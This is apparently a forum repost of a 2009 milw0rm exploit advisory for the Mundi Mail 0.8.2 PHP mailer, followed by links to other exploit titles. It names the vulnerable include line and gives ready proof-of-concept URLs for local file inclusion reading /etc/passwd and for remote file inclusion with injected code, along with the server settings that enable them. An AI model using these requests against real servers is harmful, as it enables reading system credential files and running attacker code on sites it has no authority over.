- Code:
----------------------------------------------------------------------------------------------------------
Name : Mundi Mail
Site : http://sourceforge.net/projects/mundimail/
Down : http://sourceforge.net/project/showfiles.php?group_id=100875&package_id=108474&release_id=221732
----------------------------------------------------------------------------------------------------------
Found By : br0ly
Made in : Brasil
Contact : br0ly[dot]Code[at]gmail[dot]com
----------------------------------------------------------------------------------------------------------
Description:
Bug : Local/Remote File Inclusion
template/simpledefault/admin/_masterlayout.php:10: include($top);
If allow_url_fopen=on --> RFI;
If magic_quotes_gpc=off --> LFI;
----------------------------------------------------------------------------------------------------------
P0c:
LFI:http://localhost/Scripts/mundimail/template/simpledefault/admin/_masterlayout.php?top=/etc/passwd
RFI:http://localhost/Scripts/mundimail/template/simpledefault/admin/_masterlayout.php?top=[EVIL_CODE]
OBS: need register_globals=on;
----------------------------------------------------------------------------------------------------------
# milw0rm.com [2009-06-15]
Mundi Mail 0.8.2 (top) Remote File Inclusion Vulnerability
Foxi- Admin
- Posts : 92
Reputation : -1
Join date : 2009-07-08
» PHP Melody 1.5.3 Remote File Upload Injection Vulnerability
» Pixaria Gallery 2.3.5 (file) Remote File Disclosure Exploit
» GLinks 2.1 (cat) Remote Blind SQL Injection Vulnerability
» phportal v1 (topicler.php id) Remote SQL Injection Vulnerability
» GBook 1.6 (mes_id) Remote SQL Injection Vulnerability
» Pixaria Gallery 2.3.5 (file) Remote File Disclosure Exploit
» GLinks 2.1 (cat) Remote Blind SQL Injection Vulnerability
» phportal v1 (topicler.php id) Remote SQL Injection Vulnerability
» GBook 1.6 (mes_id) Remote SQL Injection Vulnerability